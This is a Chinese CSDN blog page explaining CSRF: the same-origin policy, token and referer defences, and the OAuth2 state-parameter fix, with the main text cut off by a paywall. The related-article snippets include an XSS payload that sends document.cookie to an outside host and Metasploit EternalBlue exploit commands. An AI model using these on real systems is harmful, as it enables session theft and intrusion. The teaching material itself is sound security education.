csrf怎么获取 其他网站cookie_关于CSRF我能想到些什么

最新推荐文章于 2023-10-21 13:50:15 发布
最新推荐文章于 2023-10-21 13:50:15 发布
阅读量2.5k 收藏 7
点赞数
文章标签: csrf怎么获取 其他网站cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35216188/article/details/112116904
版权
本文详细介绍了CSRF攻击的原理,包括浏览器的同源政策及其限制,以及攻击如何利用跨域请求伪造冒充用户身份。讨论了CSRF攻击的防范措施,如csrftoken和referer check,并指出验证码的使用。此外,文章探讨了OAUTH2第三方登录存在的csrf风险,提出了带state参数的解决方案。最后,强调了防范csrf攻击的重要性。
摘要由CSDN通过智能技术生成

f218357967098e3c052ddd317d3deefe.png
其实期末周已经抽不出身写梳理文章了,但是刚好遇上了安全课的期末作业,也就顺势梳理一下web安全的一些些知识。本来是打算写csrf和xss的,但是好像做完答辩ppt,为了把csrf这个安全问题给我自己讲清楚已经花了五十页 ,于是就把标题改了,之前看过一个美团技术团队关于xss的文章写的很好的链接在这里。
(ps:因为没有专门做过相关的工作,这篇文章讲的并不是很深很实践得到的东西,只是把这一个安全问题可以串联起来的知识点顺一顺,比如计算机网络http无状态,登录态维持与cookie,浏览器同源政策, 一般防范csrf的操作,框架提供的防范操作,OAUTH2存在的csrf问题及防范的方式。)

由于浏览器的安全策略——同源政策,进行web开发经常会遇到跨域问题,于是就有了常用的几种解决方式服务器转发,CORS,jsonp。而jsonp的这种我认为有一点点hack的方式其实和csrf攻击的原理是一致的,在不违反同源政策的条件下利用请求资源的方式完成了跨域请求资源。那么:

  • 到底什么是csrf攻击,原理是什么?
  • 如何去防范csrf攻击?
  • 为什么OAUTH2的过程会存在csrf风险?

下面梳理一下

CSRF攻击的原理

  1. 浏览器同源政策

同源政策是浏览器的一个安全政策

  • 目的:是为了防止将用户信息恶意的盗取传输
  • 同源含义:域名(IP),协议头, 端口三者相同
  • MDN同源政策的内容:
    • 通常允许跨域写操作 :重定向以及表单提交。
    • 通常允许跨域资源嵌入:<script><link><img><video><iframe>
    • 不允许跨域读操作: ajax

不允许跨域读操作, 那么就代表了有三种操作会受到同源政策的限制,即不同源网站间的AJAX的请求,网站间的DOM操作,以及两者间的cookie和indexDB之间的访问。即同源政策通过限制你获取当前用户记录在其他源下的cookie等

记录在浏览器端的用户数据,以及限制了使用AJAX发送数据到其他的源的方式,以此来保障安全。那么显而易见

最低0.47元/天 解锁文章
凌子卿
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 解决Chrome Cookie 的 SameSite 属性导致无法写入cookie问题
JineD的博客
06-10 5337
今天在做前后端分离项目的时候遇到了这样一个问题。 设置了与跨站点资源http://www.****.com/关联的cookie,但没有设置' SameSite '属性。在未来的Chrome版本中,只有当跨站请求设置为“SameSite=None”和“Secure”时,才会发送cookie。您可以在应用程序>存储> cookies下查看开发工具中的cookie,并在https://www.chromestatus.com/feature/5088147346030592和https://www.c
Cookie 的 SameSite 属性
热门推荐
alone
10-09 5万+
今天在做前后端分离姓名的时候遇到了这样一个问题。 设置了与跨站点资源http://www.****.com/关联的cookie,但没有设置' SameSite '属性。在未来的Chrome版本中,只有当跨站请求设置为“SameSite=None”和“Secure”时,才会发送cookie。您可以在应用程序>存储> cookies下查看开发工具中的cookie,并在https://www...
修改哪个请求头可以伪造请求ip_被忽视的漏洞CSRF跨站请求伪造
weixin_39862669的博客
11-23 792
人类才是最大的bug起因几天前,有位师傅联系我询问CSRF的事,最近也刚好在学习CSRF,就弄出一篇文章出来吧。01CSRF简介CSRF(跨站请求伪造),是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。02Cookie这里需要了解一个概念,cookie...
CSRF xss平台获得cookie
weixin_48266255的博客
08-10 445
CSRF xss平台获得cookie
csrf怎么获取 其他网站cookie_CSRF常见攻防姿势总结
weixin_39520880的博客
12-21 1286
什么是CSRF攻击?CSRF(跨站点请求伪造),就是攻击者诱使用户访问了一个页面,以该用户身份在第三方站点里执行相关操作。比如:登陆了sohu博客后,只需要请求这个url,就能够吧编号为“156713012”的博客文章删除。http://blog.sohu.com/manage/entry.do?m=delete&id=156713012攻击者首先在自己的域构造一个页面: ...
被问出花了的 CookieCSRF
javagty6778的博客
03-05 342
我们知道 http 是无状态的,也就是说用户登录后进行其他操作时服务端无法知道用户是否已登录。有机灵的小伙伴很快想到,把用户登录信息存起来后面的接口都带上不就可以了?但 Cookie 出现前浏览器端还没有本地存储方法,JS 中在强的变量也抵不过浏览器的一次刷新。就这样Cookie\color{red}{ Cookie }Cookie 亮相了。
CookieCSRF(XSRF)
zollty的专栏
08-25 3136
本文是《Session和Cookie原理》的续篇。 在上一篇中,详细介绍了Cookie的原理。 下面介绍,如何Cookie的跨站共享,及CSRF(Cross-Site Request Forgery,跨网站请求伪造)攻击。 请先阅读《HTTP访问控制(CORS)》一文,以便对跨网站请求有一个初步了解。在这篇文章中提到的一点十分关键: “Fetch 与 CORS 的一个有趣的特性是,可以基于 HTTP cookies 和 HTTP 认证信息发送身份凭证。一般而言,对于跨域 XMLHttpR..
安全角度浅谈cookie、session、token
Packet_Lee的博客
04-14 1009
前言: 为什么要研究cookie、session和token呢? 我当前已经学习完了sql注入和部分xss攻击,其中都遇到了使用和获取cookie,不把cookie理解了,就无法完全理解黑客获取它的原因。同时深刻理解了这三者之间的关系,对于预防也有很大的指导意义。
鉴权大全(cookie、session、token、jwt、单点登录),深入理解和搞懂鉴权
qzwzsl的博客
07-18 1448
鉴权大全(cookie、session、token、jwt、单点登录),深入理解和搞懂鉴权
关于网站渗透测试的一点想法
m0_50987622的博客
04-25 283
1、永恒之蓝 msf> search ms17-010 use auxiliary/smb/smb_ms17_010 show options set rhosts 192.168.100.1/24 set threads 50 exploit use exploit/windows/smb/ms17_010_eternalblue show options set RHOST 192.168.100.192 exploit set payload windows/x64/met
CSRFCookie
agent_peakey的专栏
12-01 3793
【背景知识】 Cookie分为2种: 临时cookie,没有expire-day,浏览器打开网页得到,关闭网页销毁。 本地cookie,有expire-day,浏览器打开网页得到,生命期结束后才销毁,不论网页是否关闭。 浏览器同时打开了A页面和B页面(二者不同域名),A页面中有B页面的资源C。 所以用户打开A页面时,会请求B页面中的资源C,发给B的数据包中就带有临时cookie
XSS配合CSRF的利用 获取cookie
沐目的博客
07-11 1045
XSS的利用 获取cookie 今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。 主要就是围绕这句话展开的 <script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script> 1.首先找到XSS漏洞,然后让它可以执行这句话。 2.document.loca...
了解cookie以及cookie跨站点伪造攻击(CSRF)
我的专栏
05-15 2814
背景知识: 很久很久以前,Web基本上就是文档的浏览而已,既然是浏览,作为服务器,不需要纪录谁在某一段时间里浏览了什么 文档,每次请求都是一个新的Http协议,就是请求加响应,尤其是我不用记住是谁刚刚发了HTTP请求,每个请求对我 来说是全新的,这段时间很嗨皮。 但是,随着交互式Web应用的兴起,像在线购物网站,需要登录的网站等等,马上就面临一个问题,那就是要管理回话, 必须记住那些人登录系统,那些人往自己的购物车中放商品,也就是说我必须把每个人区分开,这就是一个不小的挑战, 因为HTTP请求是无状态.
接口测试时保存Forbidden (CSRF cookie not set.)
环游的博客
02-22 1万+
对使用django框架开发的web网页作接口测试时,使用POST方法请求数据时 出现报错: Forbidden (CSRF cookie not set.): **** 解决办法:项目文件中的setting.py中将csrf语句注释掉 ...
cookie验证不安全易遭到CSRF攻击
邓盛余
08-29 2553
一、CSRF介绍 CSRF攻击的全称是跨站请求伪造( cross site request forgery),是一种对网站的恶意利用,尽管听起来跟XSS跨站脚本攻击有点相似,但事实上CSRF与XSS差别很大,XSS利用的是站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。你可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义向第三方网站发送恶意请求。 CRSF能...
一句话领略CSRF漏洞,cookie,session,token是什么,()
qq_62708558的博客
04-17 2970
因为后端对用户凭证和来源(cookie,ip,session)的过滤未充分行为,导致的其他用户获取到合法访问凭证(别人的qq密码)的行为
一文带你了解CSRFCookie、Session和token,JWT之间的关系
大河之犬的博客
09-15 1127
所以存在被盗用的风险。比如在银行里转账,银行页面上的转账请求链接,是银行服务器那边生成的链接,所以那边是可以在请求里面就加上你客户端的token的,但是钓鱼网站无法得到你的token,钓鱼网站仿造的转账请求链接是无法把token写入的,所以就无法生效。意思是,客户端打开了钓鱼网站,却在不知情的情况下,发送了一个请求给淘宝,这个请求有可能是转账,付款等等,因为是客户端发出的请求,所以客户端会带上自己的cookie,这样就可以请求成功。基于token的验证是无状态的,这也许是它相对cookie来说最大的优点。
通俗易懂的csrf漏洞(token为什么能放cookie)
qq_39739740的博客
09-07 1004
csrf漏洞即跨站请求伪造,通俗来说即攻击者通过发送第三方网站(乱七八糟的网站)给你,然而这个网站中隐藏了对你已经登陆过的网站的一些请求,也就是含有你的身份认证信息,从而可以假扮你去操作一些事情。假设微博的关注功能存在csrf漏洞那么这就表示给用户小明点了个关注。。注意:实际http请求中是携带了你cookie(即身份信息)的,总不能还没登陆微博就能点关注吧这时,如果有人给你发了一个恶意链接****这个网站里头有一个很吸引你的图或者什么话题,然而这个话题或图的链接。
CSRF Token为什么写在Cookie中?CSRF漏洞分析
最新发布
CSDN1csdn1的博客
10-21 874
CSRF或XSRF,跨站请求伪造。简单地说,就是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。这里最最关键的因素是令牌。用户在网站A登陆成功后,服务端颁发令牌并存储到浏览器中。
django 怎么解析ensure_csrf_cookie
06-02
然而,有时我们需要手动获取这个 Token,这时可以使用 `ensure_csrf_cookie` 装饰器来实现。 `ensure_csrf_cookie` 装饰器会确保在视图函数被调用前,CSRF Token 已经被设置在 Cookie 中。这样,在表单被提交时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值